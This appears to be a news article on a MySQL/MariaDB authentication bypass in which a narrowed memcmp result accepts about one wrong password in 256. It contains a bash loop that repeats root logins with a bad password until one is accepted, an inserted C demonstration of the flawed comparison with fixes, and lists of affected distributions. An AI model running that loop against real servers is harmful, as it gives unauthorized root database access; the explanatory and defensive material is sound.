
Funny vulnerability in MySQL under Linux 64-bit
On Saturday, MariaDB project security coordinator Sergei Golubchik (petropavel) announced an interesting vulnerability in MySQL / MariaDB up to versions 5.1.61, 5.2.11, 5.3.5, 5.5.22.
The bottom line is that when a MariaDB / MySQL user connects, a token (a SHA hash derived from the password and a hash value) is calculated and compared with the expected value. MySQL's code assumes that the memcmp() function used for this comparison returns a value in the range -128..127, but on some platforms (apparently glibc on Linux with SSE optimization) the return value can fall outside that range, and when it is narrowed back into that range a nonzero result can become zero.
As a result, in roughly 1 case out of 256 the comparison of the token with the expected value reports a match regardless of the token's actual contents. In other words, a random password is accepted with a probability of 1/256.
So a simple bash command gives an attacker root access to a vulnerable MySQL server even without knowing the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
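The narrowing described above, as an added example that is not part of the original article or of MySQL's source code: a constructed stand-in for an optimized memcmp that may return values outside -128..127, the vulnerable pattern of returning that int through MySQL's one-byte my_bool, and two corrected forms. wide_memcmp, the my_bool typedef, the buffer contents and all function names are assumptions made for this demonstration, not glibc's or MySQL's code.

```c
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;   /* MySQL's one-byte boolean; the narrowing happens here */

/* Constructed stand-in for an optimized memcmp: it compares 16-bit big-endian
 * units and returns the numeric difference of the first unit that differs.
 * It is not glibc's code; it only models a memcmp whose return value is not
 * confined to -128..127, which is the property the advisory describes. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    size_t i;
    for (i = 0; i + 1 < n; i += 2) {
        int wa = (a[i] << 8) | a[i + 1];
        int wb = (b[i] << 8) | b[i + 1];
        if (wa != wb)
            return wa - wb;          /* may be far outside -128..127 */
    }
    if (n & 1)
        return (int)a[n - 1] - (int)b[n - 1];
    return 0;
}

/* Vulnerable pattern: the int result is returned through my_bool, so a
 * nonzero difference that is a multiple of 256 is narrowed to 0 ("match"). */
static my_bool check_scramble_vulnerable(const unsigned char *expected,
                                         const unsigned char *got)
{
    return wide_memcmp(expected, got, SHA1_HASH_SIZE);
}

/* Fixed pattern: reduce the comparison to 0/1 while it is still an int. */
static my_bool check_scramble_fixed(const unsigned char *expected,
                                    const unsigned char *got)
{
    return wide_memcmp(expected, got, SHA1_HASH_SIZE) != 0;
}

/* Preferred form for secret comparison: never narrows, and its running time
 * does not depend on where the two inputs first differ. Returns 1 on mismatch. */
static int hash_mismatch_ct(const unsigned char *a, const unsigned char *b, size_t n)
{
    unsigned char acc = 0;
    size_t i;
    for (i = 0; i < n; i++)
        acc |= (unsigned char)(a[i] ^ b[i]);
    return acc != 0;
}

/* Constructed pair of 20-byte hashes that differ by exactly 0x0100 in the
 * first 16-bit unit, so wide_memcmp returns 256. */
static void make_mismatching_pair(unsigned char expected[SHA1_HASH_SIZE],
                                  unsigned char got[SHA1_HASH_SIZE])
{
    memset(expected, 0xAB, SHA1_HASH_SIZE);
    memcpy(got, expected, SHA1_HASH_SIZE);
    expected[0] = 0x01;
    got[0] = 0x00;      /* differ in the high byte of the first unit only */
}

/* Verdicts for the constructed mismatching pair; 0 means "accepted as equal". */
int raw_memcmp_on_mismatch(void)
{
    unsigned char e[SHA1_HASH_SIZE], g[SHA1_HASH_SIZE];
    make_mismatching_pair(e, g);
    return wide_memcmp(e, g, SHA1_HASH_SIZE);
}
int vulnerable_verdict_on_mismatch(void)
{
    unsigned char e[SHA1_HASH_SIZE], g[SHA1_HASH_SIZE];
    make_mismatching_pair(e, g);
    return check_scramble_vulnerable(e, g);
}
int fixed_verdict_on_mismatch(void)
{
    unsigned char e[SHA1_HASH_SIZE], g[SHA1_HASH_SIZE];
    make_mismatching_pair(e, g);
    return check_scramble_fixed(e, g);
}
int ct_verdict_on_mismatch(void)
{
    unsigned char e[SHA1_HASH_SIZE], g[SHA1_HASH_SIZE];
    make_mismatching_pair(e, g);
    return hash_mismatch_ct(e, g, SHA1_HASH_SIZE);
}
/* Sanity check: a genuinely equal pair is still accepted by the fixed form. */
int fixed_verdict_on_equal(void)
{
    unsigned char e[SHA1_HASH_SIZE];
    memset(e, 0xAB, SHA1_HASH_SIZE);
    return check_scramble_fixed(e, e);
}

int main(void)
{
    printf("raw memcmp result : %d\n", raw_memcmp_on_mismatch());
    printf("vulnerable check  : %d  (0 = wrongly accepted)\n", vulnerable_verdict_on_mismatch());
    printf("fixed check       : %d\n", fixed_verdict_on_mismatch());
    printf("constant-time     : %d\n", ct_verdict_on_mismatch());
    return 0;
}
```

In this model every difference that lands in the high byte of a unit collapses to zero, so the false-accept rate is higher than the 1/256 the advisory reports for real builds; the point it demonstrates is the same: a comparison result must be reduced to 0/1 (or compared with a constant-time routine) before it is stored in a narrower type.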
Currently, the vulnerability is unofficially confirmed in the following configurations:
Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (the same)
Fedora 16 (64-bit)
Users also report configurations in which the vulnerability does not seem to be observed:
Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably all)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24+lenny5
Debian Linux lenny 64-bit 5.0.51a-24+lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0+squeeze1
Debian Linux squeeze 64-bit 5.1.61-0+squeeze1
There is no exact list of vulnerable and invulnerable systems.
Joshua Drake of Accuvant Labs published a program for checking whether a server is vulnerable.